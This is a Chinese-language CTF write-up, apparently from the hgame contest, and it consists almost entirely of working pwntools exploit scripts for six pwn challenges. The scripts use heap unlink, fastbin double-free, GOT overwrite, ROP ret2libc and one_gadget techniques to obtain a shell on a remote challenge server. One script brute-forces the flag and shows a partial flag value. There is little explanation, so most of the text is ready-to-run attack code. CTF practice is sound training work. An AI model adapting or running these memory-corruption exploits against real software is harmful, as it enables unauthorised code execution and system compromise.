打了我就記錄一下
(有點記不太清了有點久了~~)
Annevi
這道題是做2次unlink然後寫got表即可
#!/usr/bin/python2
from pwn import *
local=0
if local==1:
p=process('./Annevi')
elf=ELF('./Annevi')
libc=elf.libc
else:
p=remote('47.103.214.163',20301)
elf=ELF('./Annevi')
libc=elf.libc
def add(size,content):
p.sendlineafter(':','1')
p.sendlineafter('?',str(size))
p.sendlineafter('content:',content)
def delete(idx):
p.sendlineafter(':','2')
p.sendlineafter('index?',str(idx))
def show(idx):
p.sendlineafter(':','3')
p.sendlineafter('index?',str(idx))
def edit(idx,content):
p.sendlineafter(':','4')
p.sendlineafter('index?',str(idx))
p.sendlineafter('content:',content)
def exp():
add(0x90,'aaaa')#0
add(0x90,'aaaa')#1
add(0x90,'bbbb')#2
add(0x90,'/bin/sh\x00')#3
add(0x90,'/bin/sh\x00')#4
payload=p64(0)+p64(0x91)+p64(0x602040-0x18)+p64(0x602040-0x10)+'a'*0x70+p64(0x90)+p64(0xa0)
edit(0,payload)
delete(1)
payload=p64(0)*3+p64(elf.got['atoi'])
edit(0,payload)
show(0)
libcbase=u64(p.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['atoi']
system=libcbase+libc.sym['system']
malloc_hook=libcbase+libc.sym['__malloc_hook']
free_hook=libcbase+libc.sym['__free_hook']
one_gadget=libcbase+0xf1147
log.success('libcbase: '+hex(libcbase))
payload=p64(0)+p64(0x91)+p64(0x602050-0x18)+p64(0x602050-0x10)+'a'*0x70+p64(0x90)+p64(0xa0)
edit(2,payload)
delete(3)
payload=p64(0)+p64(free_hook)
edit(2,payload)
edit(0,p64(system))
show(0)
p.interactive()
if __name__=="__main__":
exp()
Another_Heaven
截斷爆破我記得用了好久
from pwn import *
#p=process('./Another_Heaven')
for j in range(97,127):
p=remote('47.103.214.163',21001)
p.recvuntil('!"')
payload=str(0x602160+43)
p.sendline(payload)
sleep(0.2)
p.send('\x00')
p.recvuntil(':')
p.sendline('E99p1ant')
p.recvuntil(':')
payload='hgame{VGhlX2Fub3RoZXJfd2F5X3RvX2hlYXZlbg=='
payload=payload+chr(j)
p.sendline(payload)
replay=p.recv()
if 'Welcome' in replay:
print "yes!!!"+payload
break
#p.interactive()
print payload
#hgame{VGh
Hard_AAAAA
#!/usr/bin/python2
from pwn import *
local=0
if local==1:
p=process('./Hard_AAAAA')
elf=ELF('./Hard_AAAAA')
else:
p=remote('47.103.214.163',20000)
def exp():
p.recvuntil('!')
payload='a'*(0xac-0x31)+'0O0o\x00O0'
p.sendline(payload)
p.interactive()
if __name__=="__main__":
exp()
One_Shot
#!/usr/bin/python2
from pwn import *
local=0
if local==1:
p=process('./One_Shot')
else:
p=remote('47.103.214.163',20002)
def exp():
p.recvuntil('?')
payload='a'*0x20
p.sendline(payload)
p.recvuntil('shot!')
p.sendline(str(0x06010E0))
p.interactive()
if __name__=="__main__":
exp()
ROP_LEVEL0
#!/usr/bin/python2
from pwn import *
local=0
if local==1:
p=process('./ROP_LEVEL0')
elf=ELF('./ROP_LEVEL0')
libc=elf.libc
else:
p=remote('47.103.214.163',20003)
elf=ELF('./ROP_LEVEL0')
libc=elf.libc
def exp():
pop_rdi=0x400753
p.recvuntil('./flag')
payload='a'*0x50+p64(0)+p64(pop_rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(0x40065B)
p.send(payload)
put=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
libcbase=put-libc.sym['puts']
system=libcbase+libc.sym['system']
bin_sh=libcbase+libc.search('/bin/sh').next()
p.recvuntil('./flag')
payload='a'*0x50+p64(0)+p64(pop_rdi)+p64(bin_sh)+p64(system)+p64(0)
p.send(payload)
p.interactive()
if __name__=="__main__":
exp()
Roc826
先改指針leak然後正常打malloc_hook
#!/usr/bin/python2
from pwn import *
local=1
if local==1:
p=process('./Roc826')
elf=ELF('./Roc826')
libc=elf.libc
else:
p=remote('47.103.214.163',21002)
elf=ELF('./Roc826')
libc=elf.libc
def add(size,content):
p.sendlineafter(':','1')
p.sendlineafter('size?',str(size))
p.sendlineafter('content:',content)
def delete(idx):
p.sendlineafter(':','2')
p.sendlineafter('index?',str(idx))
def show(idx):
p.sendlineafter(':','3')
p.sendlineafter('index?',str(idx))
lg=lambda address,data:log.success('%s: '%(address)+hex(data))
def exp():
add(0x50,'doudou0') #0
add(0x40,'douodu1') #1
add(0x40,'doudou5') #2
add(0x68,'doudou2') #3
add(0x68,'doudou3') #4
add(0x18,'doudou4') #5
delete(3)
delete(4)
delete(3)
add(0x68,p64(0x60208d))
add(0x68,'dd0')
add(0x68,'dd1')
add(0x60,p64(0)*2+'\xaa\xaa\xaa'+p64(elf.got['puts']))
show(2)
put=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
libcbase=put-libc.sym['puts']
o_g=[0x45216,0x4526a,0xf02a4,0xf1147]
malloc_hook=libcbase+libc.sym['__malloc_hook']
one_gadget=libcbase+o_g[3]
lg('libcbase',libcbase)
delete(6)
delete(7)
delete(6)
add(0x68,p64(malloc_hook-0x23))
add(0x68,'su')
add(0x68,'su1')
add(0x68,'a'*19+p64(one_gadget))
show(8)
p.sendlineafter(':','1')
p.sendlineafter('size?',str(1))
p.interactive()
if __name__=="__main__":
exp()